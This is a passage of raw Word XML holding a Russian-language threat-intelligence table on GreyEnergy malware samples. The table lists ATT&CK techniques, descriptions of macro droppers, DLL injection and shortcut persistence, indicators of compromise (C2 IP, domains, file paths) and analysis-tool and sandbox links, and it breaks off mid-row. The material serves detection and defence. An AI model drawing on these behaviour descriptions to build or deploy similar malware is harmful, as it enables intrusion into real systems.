        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02226A0E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</w:rPr>
              <w:t>Описание и принципы работы</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D4B3EF9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</w:rPr>
              <w:t>Индикаторы компрометации (</w:t>
            </w:r>
            <w:r w:rsidRPr="00B249CD">
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>IoC</w:t>
            </w:r>
            <w:r w:rsidRPr="00B249CD">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4ABBD6E3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</w:rPr>
              <w:t xml:space="preserve">Способы выявления </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1765" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="232F99C2" w14:textId="77777777" w:rsidR="00B249CD" w:rsidRPr="00B249CD" w:rsidRDefault="00B249CD" w:rsidP="00B249CD">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B249CD">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Ссылки </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B249CD" w:rsidRPr="00345FEC" w14:paraId="23164B8C" w14:textId="77777777" w:rsidTr="00B249CD">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="420" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B73CBD6" w14:textId="77777777" w:rsidR="00B249CD" w:rsidRPr="00B249CD" w:rsidRDefault="00B249CD" w:rsidP="00B249CD">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00B249CD">
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1435" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="445F924E" w14:textId="2550F09D" w:rsidR="00B249CD" w:rsidRPr="00B249CD" w:rsidRDefault="00B249CD" w:rsidP="00B249CD">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B249CD">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>GreyEnergyDropper.doc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="217C91B4" w14:textId="4E2BBB1A" w:rsidR="00B249CD" w:rsidRPr="00350A06" w:rsidRDefault="00350A06" w:rsidP="00B249CD">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00350A06">
              <w:t>Начальный вектор атаки (</w:t>
            </w:r>
            <w:r w:rsidRPr="00350A06">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>phishing</w:t>
            </w:r>
            <w:r w:rsidRPr="00350A06">
              <w:t xml:space="preserve">), доставка дроппера через документ </w:t>
            </w:r>
            <w:r w:rsidRPr="00350A06">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Word</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2329" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3EA885A3" w14:textId="7F0DC602" w:rsidR="00D4660F" w:rsidRPr="00D4660F" w:rsidRDefault="00D4660F" w:rsidP="00D4660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-T15</w:t>
            </w:r>
            <w:r w:rsidRPr="00D4660F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>98.003 (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Reconnaissance – Spearphishing Link)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="621B96C7" w14:textId="0EABCAE7" w:rsidR="00D4660F" w:rsidRDefault="00D4660F" w:rsidP="00D4660F">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D4660F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>- T1204.002 (User Execution: Malicious File)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F93B2B7" w14:textId="3CC9CFB9" w:rsidR="00D4660F" w:rsidRDefault="00D4660F" w:rsidP="00D4660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D4660F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>T1547.009</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:r w:rsidR="00055639">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Persistence</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Shortcut Modification)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63AE8FA4" w14:textId="1F90F8FA" w:rsidR="00D4660F" w:rsidRPr="00D4660F" w:rsidRDefault="00D4660F" w:rsidP="00D4660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-T1112 (Persistence – Modify Registry)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="577444F5" w14:textId="142EDA90" w:rsidR="00D4660F" w:rsidRPr="00D4660F" w:rsidRDefault="00D4660F" w:rsidP="00D4660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-</w:t>
            </w:r>
            <w:r w:rsidRPr="00D4660F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>T1027 (Obfuscated Files)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42EE784A" w14:textId="1E2BE33A" w:rsidR="00B249CD" w:rsidRPr="00D4660F" w:rsidRDefault="00D4660F" w:rsidP="00D4660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D4660F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>T1071.001 (Application Layer Protocol: Web Protocols)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="518976D0" w14:textId="12A655B6" w:rsidR="00B249CD" w:rsidRPr="00D4660F" w:rsidRDefault="00D4660F" w:rsidP="00B249CD">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00D4660F">
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Документ содержит обфусцированный </w:t>
            </w:r>
            <w:r w:rsidRPr="00D4660F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>VBA</w:t>
            </w:r>
            <w:r w:rsidRPr="00D4660F">
              <w:t xml:space="preserve">-макрос. При открытии: декодирует </w:t>
            </w:r>
            <w:r w:rsidRPr="00D4660F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>B</w:t>
            </w:r>
            <w:r w:rsidRPr="00D4660F">
              <w:t xml:space="preserve">64-строку, создаёт </w:t>
            </w:r>
            <w:r w:rsidRPr="00D4660F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>LNK</w:t>
            </w:r>
            <w:r w:rsidRPr="00D4660F">
              <w:t>-файл в %</w:t>
            </w:r>
            <w:r w:rsidRPr="00D4660F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>APPDATA</w:t>
            </w:r>
            <w:r w:rsidRPr="00D4660F">
              <w:t>%\</w:t>
            </w:r>
            <w:r w:rsidRPr="00D4660F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Microsoft</w:t>
            </w:r>
            <w:r w:rsidRPr="00D4660F">
              <w:t>\</w:t>
            </w:r>
            <w:r w:rsidRPr="00D4660F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Office</w:t>
            </w:r>
            <w:r w:rsidRPr="00D4660F">
              <w:t>\</w:t>
            </w:r>
            <w:r w:rsidRPr="00D4660F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Recent</w:t>
            </w:r>
            <w:r w:rsidRPr="00D4660F">
              <w:t xml:space="preserve">\, запускает </w:t>
            </w:r>
            <w:r w:rsidRPr="00D4660F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TVUNSS</w:t>
            </w:r>
            <w:r w:rsidRPr="00D4660F">
              <w:t>3.</w:t>
            </w:r>
            <w:r w:rsidRPr="00D4660F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>exe</w:t>
            </w:r>
            <w:r w:rsidRPr="00D4660F">
              <w:t xml:space="preserve"> через </w:t>
            </w:r>
            <w:r w:rsidRPr="00D4660F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>WScript</w:t>
            </w:r>
            <w:r w:rsidRPr="00D4660F">
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="00D4660F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Shell</w:t>
            </w:r>
            <w:r w:rsidRPr="00D4660F">
              <w:t xml:space="preserve">. Использует </w:t>
            </w:r>
            <w:r w:rsidRPr="00D4660F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Msxml</w:t>
            </w:r>
            <w:r w:rsidRPr="00D4660F">
              <w:t>2.</w:t>
            </w:r>
            <w:r w:rsidRPr="00D4660F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>XMLHTTP</w:t>
            </w:r>
            <w:r w:rsidRPr="00D4660F">
              <w:t xml:space="preserve"> для скачивания </w:t>
            </w:r>
            <w:r w:rsidRPr="00D4660F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>payload</w:t>
            </w:r>
            <w:r w:rsidRPr="00D4660F">
              <w:t xml:space="preserve"> с </w:t>
            </w:r>
            <w:r w:rsidRPr="00D4660F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>pbank</w:t>
            </w:r>
            <w:r w:rsidRPr="00D4660F">
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="00D4660F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>co</w:t>
            </w:r>
            <w:r w:rsidRPr="00D4660F">
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="00D4660F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ua</w:t>
            </w:r>
            <w:r w:rsidRPr="00D4660F">
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00D4660F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>favicon</w:t>
            </w:r>
            <w:r w:rsidRPr="00D4660F">
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="00D4660F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ico</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="087086B1" w14:textId="4C2D84A1" w:rsidR="00D4660F" w:rsidRPr="00D4660F" w:rsidRDefault="00D4660F" w:rsidP="00D4660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-</w:t>
            </w:r>
            <w:r>
              <w:t>Домен</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>: pbank.co.ua, privatbank.ua</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FEBE347" w14:textId="0799A580" w:rsidR="00D4660F" w:rsidRPr="00D4660F" w:rsidRDefault="00D4660F" w:rsidP="00D4660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>
              <w:t>Путь</w:t>
            </w:r>
            <w:r w:rsidRPr="00D4660F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>: %APPDATA%\Microsoft\Office\Recent\GreyEnergyDropper.doc.LNK</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="219FF1CA" w14:textId="2C5587E2" w:rsidR="00B249CD" w:rsidRPr="00D4660F" w:rsidRDefault="00D4660F" w:rsidP="00D4660F">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>-Файл: %TEMP%\TVUNSS3.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="100B9F43" w14:textId="5735A734" w:rsidR="00B249CD" w:rsidRPr="00D4660F" w:rsidRDefault="00D4660F" w:rsidP="00B249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Olevba</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1765" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28E98EC1" w14:textId="071A7DFA" w:rsidR="00B249CD" w:rsidRPr="00345FEC" w:rsidRDefault="00345FEC" w:rsidP="00B249CD">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId43" w:history="1">
              <w:r w:rsidR="00350A06" w:rsidRPr="00345FEC">
                <w:rPr>
                  <w:rStyle w:val="aff3"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>https://www.virustotal.com/gui/file/f50ee030224bf617ba71d88422c25d7e489571bc1aba9e65dc122a45122c9321/behavior</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00350A06" w:rsidRPr="00345FEC">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D4660F" w:rsidRPr="00345FEC" w14:paraId="120830A7" w14:textId="77777777" w:rsidTr="00B249CD">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="420" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57141CA3" w14:textId="605E8F91" w:rsidR="00D4660F" w:rsidRPr="00D4660F" w:rsidRDefault="00D4660F" w:rsidP="00B249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1435" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="399B7BF9" w14:textId="55C6D69B" w:rsidR="00D4660F" w:rsidRPr="00B249CD" w:rsidRDefault="00D4660F" w:rsidP="00B249CD">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D4660F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>GreyEnergymini.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CEFC25F" w14:textId="1BBAE6D8" w:rsidR="00D4660F" w:rsidRPr="00350A06" w:rsidRDefault="00D4660F" w:rsidP="00D4660F">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00D4660F">
              <w:t xml:space="preserve">Модульный </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">дроппер, </w:t>
            </w:r>
            <w:r w:rsidRPr="00D4660F">
              <w:t>сбор информации, латеральное движение</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2329" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59EA2687" w14:textId="57BD2AC9" w:rsidR="00D4660F" w:rsidRDefault="00B3662F" w:rsidP="00B3662F">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B3662F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>T1055 (Privilege Escalation – Process Injection)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2384A828" w14:textId="16FC58A6" w:rsidR="00B3662F" w:rsidRDefault="00B3662F" w:rsidP="00B366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-T1218.011 (Defense Evasion – rundll32)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46B853CE" w14:textId="67B9D12B" w:rsidR="00B3662F" w:rsidRDefault="00B3662F" w:rsidP="00B366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-T1106 (Execution – Native API)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B74D2D7" w14:textId="0D434AF3" w:rsidR="00B3662F" w:rsidRDefault="00B3662F" w:rsidP="00B366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-T1204.002 (Execution – Malicious File)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BDE6D89" w14:textId="3652882B" w:rsidR="00B3662F" w:rsidRDefault="00B3662F" w:rsidP="00B366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-T1114 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>(Collection – Email)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="350071DB" w14:textId="21563755" w:rsidR="00B3662F" w:rsidRPr="00B3662F" w:rsidRDefault="00B3662F" w:rsidP="00B366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-T1518.001 (Discovery – Security Software)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D1CB300" w14:textId="648BE210" w:rsidR="00D4660F" w:rsidRPr="00B3662F" w:rsidRDefault="00B3662F" w:rsidP="00893B9A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00B3662F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>PE</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3662F">
              <w:t xml:space="preserve">32 </w:t>
            </w:r>
            <w:r w:rsidRPr="00B3662F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>DLL</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3662F">
              <w:t xml:space="preserve">, маскируется под </w:t>
            </w:r>
            <w:r w:rsidRPr="00B3662F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>exe</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3662F">
              <w:t>. При запуске: распаковывается в па</w:t>
            </w:r>
            <w:r w:rsidR="00893B9A">
              <w:t xml:space="preserve">мять, инжектит код с помощью </w:t>
            </w:r>
            <w:r w:rsidR="00893B9A">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>rundll</w:t>
            </w:r>
            <w:r w:rsidR="00893B9A" w:rsidRPr="00893B9A">
              <w:t>32.</w:t>
            </w:r>
            <w:r w:rsidR="00893B9A">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>exe</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3662F">
              <w:t xml:space="preserve">, создаёт </w:t>
            </w:r>
            <w:r w:rsidRPr="00B3662F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>LNK</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3662F">
              <w:t xml:space="preserve"> в %</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3662F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>APPDATA</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3662F">
              <w:t>%\</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3662F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Microsoft</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3662F">
              <w:t>\</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3662F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Windows</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3662F">
              <w:t>\</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3662F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Start</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3662F">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00B3662F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Menu</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3662F">
              <w:t>\</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3662F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Programs</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3662F">
              <w:t>\</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3662F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Startup</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3662F">
              <w:t xml:space="preserve">\. Использует </w:t>
            </w:r>
            <w:r w:rsidRPr="00B3662F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>WMI</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3662F">
              <w:t xml:space="preserve">) для разведки. Отправляет данные на </w:t>
            </w:r>
            <w:r w:rsidRPr="00B3662F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>C</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3662F">
              <w:t>2 217.12.204.100</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2829A960" w14:textId="7246C575" w:rsidR="00893B9A" w:rsidRPr="00893B9A" w:rsidRDefault="00893B9A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93B9A">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>IP: 217.12.204.100 (C2)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B03599E" w14:textId="21C8F86A" w:rsidR="00893B9A" w:rsidRPr="00893B9A" w:rsidRDefault="00893B9A" w:rsidP="00893B9A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00893B9A">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:t>Путь</w:t>
            </w:r>
            <w:r w:rsidRPr="00893B9A">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>: %A</w:t>
            </w:r>
            <w:r w:rsidR="008E634E">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>PPDATA%\Microsoft\{GUID</w:t>
            </w:r>
            <w:r w:rsidRPr="00893B9A">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>}.dbf</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="010BFC0B" w14:textId="7A863225" w:rsidR="00D4660F" w:rsidRPr="00893B9A" w:rsidRDefault="00893B9A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93B9A">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>LNK: %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\*.lnk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F08DF73" w14:textId="77777777" w:rsidR="00D4660F" w:rsidRDefault="00893B9A" w:rsidP="00B249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IDAPro,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="187DEF1C" w14:textId="77777777" w:rsidR="00893B9A" w:rsidRDefault="00893B9A" w:rsidP="00B249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Process Hacker,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43D0DAFB" w14:textId="56F95FC3" w:rsidR="00893B9A" w:rsidRPr="00893B9A" w:rsidRDefault="00893B9A" w:rsidP="00B249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Process Monitor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1765" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E6DB6BC" w14:textId="1BC94CB5" w:rsidR="00D4660F" w:rsidRPr="00893B9A" w:rsidRDefault="00345FEC" w:rsidP="00B249CD">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId44" w:history="1">
              <w:r w:rsidR="00893B9A" w:rsidRPr="00B045B5">
                <w:rPr>
                  <w:rStyle w:val="aff3"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>https://hybrid-analysis.com/sample/b60c0c04badc8c5defab653c581d57505b3455817b57ee70af74311fa0b65e22/65196c433ce352131806c194</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00893B9A">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00893B9A" w:rsidRPr="00345FEC" w14:paraId="1E6DE4D9" w14:textId="77777777" w:rsidTr="00B249CD">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="420" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08CA3DB0" w14:textId="41A5974A" w:rsidR="00893B9A" w:rsidRDefault="00893B9A" w:rsidP="00B249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1435" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51AD4A80" w14:textId="2536F7A4" w:rsidR="00893B9A" w:rsidRPr="00D4660F" w:rsidRDefault="00893B9A" w:rsidP="00B249CD">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00893B9A">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>GreyEnergyDropper.bin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="000FE7DF" w14:textId="6255817B" w:rsidR="00893B9A" w:rsidRPr="00D4660F" w:rsidRDefault="00DE7F27" w:rsidP="00893B9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DE7F27">
              <w:t>Дроппер, установка бэкдора через взлом системной службы</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2329" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02EE8F41" w14:textId="44C1C1A1" w:rsidR="00893B9A" w:rsidRDefault="00893B9A" w:rsidP="00893B9A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00893B9A">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>T1204.002 (Execution – Malisious File)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C329455" w14:textId="296F30BE" w:rsidR="00893B9A" w:rsidRDefault="00893B9A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-T1055 (Privilege Escalation – DLL-injection)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2953A89E" w14:textId="7A35EFB2" w:rsidR="00893B9A" w:rsidRDefault="00893B9A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-T1057 (Discovery – Process Discovery)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42DA7633" w14:textId="270AF2DD" w:rsidR="00893B9A" w:rsidRPr="00893B9A" w:rsidRDefault="00893B9A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-T1047 (Execution – Windows Management </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Instrumentation)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2641E10B" w14:textId="34F2EA8D" w:rsidR="00893B9A" w:rsidRPr="00893B9A" w:rsidRDefault="00777471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893B9A" w:rsidRPr="00893B9A">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>T1543.003 (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Persistence - </w:t>
            </w:r>
            <w:r w:rsidR="00893B9A" w:rsidRPr="00893B9A">
              <w:rPr>
